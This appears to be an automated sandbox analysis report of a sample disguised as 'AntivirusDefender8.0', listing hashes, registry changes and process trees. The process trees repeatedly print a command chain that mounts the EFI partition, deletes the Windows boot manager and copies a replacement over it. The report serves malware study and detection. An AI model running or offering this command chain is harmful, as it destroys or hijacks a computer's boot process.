1ee3788918d34886873b12b45d7723e64eebe81cd117dbbf95f75fb99b38ea2d

Resubmissions

08/07/2024, 11:05

240708-m639fsyaph 4

08/07/2024, 11:00

08/07/2024, 10:54

08/07/2024, 10:49

08/07/2024, 10:46

08/07/2024, 10:42

Analysis

max time kernel
147s
max time network
123s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
08/07/2024, 10:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AntivirusDefender8.0-main.zip
Size

34KB
MD5

5c90630ffc59f7c9177238825bd053b5
SHA1

1169dcec468c24a74e774405e570dc6c4916825e
SHA256

1ee3788918d34886873b12b45d7723e64eebe81cd117dbbf95f75fb99b38ea2d
SHA512

0ef1e0c24ca9001a30476eaa640ef3b36890af790e6a45d92fcae42436f80bc5039000c0e37101632e8cb890e4faef8de34cd3541e38e9c1527d812c3a357162
SSDEEP

768:QDbFz8pPHib6SEJWNsjj45uY9FZ4nPl1SItgKb:QVwviSljj4VJOOapb

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 7 IoCs

pid	Process
1700	RUNTHISFIRST.exe
3008	RUNTHISFIRST.exe
844	RUNTHISFIRST.exe
404	RUNTHISFIRST.exe
580	RUNTHISFIRST.exe
776	RUNTHISFIRST.exe
1428	RUNTHISFIRST.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TypedURLs	taskmgr.exe

Modifies registry class 43 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	taskmgr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 52003100000000005458d165100057696e646f7773003c0008000400efbeee3a851a5458d1652a0000008a020000000001000000000000000000000000000000570069006e0064006f0077007300000016000000	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f44471a0359723fa74489c55595fe6b30ee0000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 7e0074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f3c0008000400efbe00000000000000002a000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "5"	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 4a0031000000000000000000102054656d700000360008000400efbe00000000000000002a00000000000000000000000000000000000000000000000000540065006d007000000014000000	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4a003100000000005458d765100054656d700000360008000400efbeee3a881a5458d7652a000000850e0000000001000000000000000000000000000000540065006d007000000014000000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	taskmgr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4c003100000000000000000010004c6f63616c00380008000400efbe00000000000000002a000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1752	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1752	taskmgr.exe
Token: SeRestorePrivilege	996	7zG.exe
Token: 35	996	7zG.exe
Token: SeSecurityPrivilege	996	7zG.exe
Token: SeSecurityPrivilege	996	7zG.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
996	7zG.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe
1752	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1752	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2036 wrote to memory of 2020	2036	cmd.exe	39
PID 2036 wrote to memory of 2020	2036	cmd.exe	39
PID 2036 wrote to memory of 2020	2036	cmd.exe	39
PID 2020 wrote to memory of 2760	2020	cmd.exe	41
PID 2020 wrote to memory of 2760	2020	cmd.exe	41
PID 2020 wrote to memory of 2760	2020	cmd.exe	41
PID 2752 wrote to memory of 2872	2752	cmd.exe	44
PID 2752 wrote to memory of 2872	2752	cmd.exe	44
PID 2752 wrote to memory of 2872	2752	cmd.exe	44
PID 2872 wrote to memory of 1908	2872	cmd.exe	46
PID 2872 wrote to memory of 1908	2872	cmd.exe	46
PID 2872 wrote to memory of 1908	2872	cmd.exe	46
PID 2052 wrote to memory of 1980	2052	cmd.exe	49
PID 2052 wrote to memory of 1980	2052	cmd.exe	49
PID 2052 wrote to memory of 1980	2052	cmd.exe	49
PID 1980 wrote to memory of 2112	1980	cmd.exe	51
PID 1980 wrote to memory of 2112	1980	cmd.exe	51
PID 1980 wrote to memory of 2112	1980	cmd.exe	51
PID 336 wrote to memory of 880	336	cmd.exe	54
PID 336 wrote to memory of 880	336	cmd.exe	54
PID 336 wrote to memory of 880	336	cmd.exe	54
PID 880 wrote to memory of 1100	880	cmd.exe	56
PID 880 wrote to memory of 1100	880	cmd.exe	56
PID 880 wrote to memory of 1100	880	cmd.exe	56
PID 1700 wrote to memory of 2348	1700	RUNTHISFIRST.exe	60
PID 1700 wrote to memory of 2348	1700	RUNTHISFIRST.exe	60
PID 1700 wrote to memory of 2348	1700	RUNTHISFIRST.exe	60
PID 1700 wrote to memory of 2348	1700	RUNTHISFIRST.exe	60
PID 2348 wrote to memory of 912	2348	cmd.exe	62
PID 2348 wrote to memory of 912	2348	cmd.exe	62
PID 2348 wrote to memory of 912	2348	cmd.exe	62
PID 2348 wrote to memory of 912	2348	cmd.exe	62
PID 3008 wrote to memory of 2108	3008	RUNTHISFIRST.exe	65
PID 3008 wrote to memory of 2108	3008	RUNTHISFIRST.exe	65
PID 3008 wrote to memory of 2108	3008	RUNTHISFIRST.exe	65
PID 3008 wrote to memory of 2108	3008	RUNTHISFIRST.exe	65
PID 2108 wrote to memory of 2800	2108	cmd.exe	67
PID 2108 wrote to memory of 2800	2108	cmd.exe	67
PID 2108 wrote to memory of 2800	2108	cmd.exe	67
PID 2108 wrote to memory of 2800	2108	cmd.exe	67
PID 844 wrote to memory of 2632	844	RUNTHISFIRST.exe	70
PID 844 wrote to memory of 2632	844	RUNTHISFIRST.exe	70
PID 844 wrote to memory of 2632	844	RUNTHISFIRST.exe	70
PID 844 wrote to memory of 2632	844	RUNTHISFIRST.exe	70
PID 2632 wrote to memory of 1544	2632	cmd.exe	72
PID 2632 wrote to memory of 1544	2632	cmd.exe	72
PID 2632 wrote to memory of 1544	2632	cmd.exe	72
PID 2632 wrote to memory of 1544	2632	cmd.exe	72
PID 404 wrote to memory of 904	404	RUNTHISFIRST.exe	75
PID 404 wrote to memory of 904	404	RUNTHISFIRST.exe	75
PID 404 wrote to memory of 904	404	RUNTHISFIRST.exe	75
PID 404 wrote to memory of 904	404	RUNTHISFIRST.exe	75
PID 904 wrote to memory of 2964	904	cmd.exe	77
PID 904 wrote to memory of 2964	904	cmd.exe	77
PID 904 wrote to memory of 2964	904	cmd.exe	77
PID 904 wrote to memory of 2964	904	cmd.exe	77
PID 580 wrote to memory of 2212	580	RUNTHISFIRST.exe	80
PID 580 wrote to memory of 2212	580	RUNTHISFIRST.exe	80
PID 580 wrote to memory of 2212	580	RUNTHISFIRST.exe	80
PID 580 wrote to memory of 2212	580	RUNTHISFIRST.exe	80
PID 2212 wrote to memory of 2084	2212	cmd.exe	82
PID 2212 wrote to memory of 2084	2212	cmd.exe	82
PID 2212 wrote to memory of 2084	2212	cmd.exe	82
PID 2212 wrote to memory of 2084	2212	cmd.exe	82

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\AntivirusDefender8.0-main.zip
1⤵
PID:2208

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1752

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap29943:108:7zEvent1090
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
- Suspicious use of WriteProcessMemory
PID:2752
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:1908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
- Suspicious use of WriteProcessMemory
PID:336
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:1100

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:912

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2800

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:844
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:1544

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:404
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2964

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2084

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
PID:776
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:656

C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe
"C:\Users\Admin\Desktop\AntivirusDefender8.0-main\RUNTHISFIRST.exe"
1⤵
- Executes dropped EXE
PID:1428
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c mountvol x: /s
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\mountvol.exe
    mountvol x: /s
    3⤵
    PID:1636

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:1724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:1032
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:1648
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:352
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:2424
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:1248
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:2568
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:2676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:1772
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:812
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
    PID:1360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "start cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y""
1⤵
PID:1608
- C:\Windows\system32\cmd.exe
  cmd /c "mountvol x: /s && icacls x: && del x:\efi\microsoft\boot\bootmgfw.efi && copy bootmgfw.efi x:\efi\microsoft\boot\bootmgfw.efi /Y"
  2⤵
  PID:2036
- - C:\Windows\system32\mountvol.exe
    mountvol x: /s
    3⤵
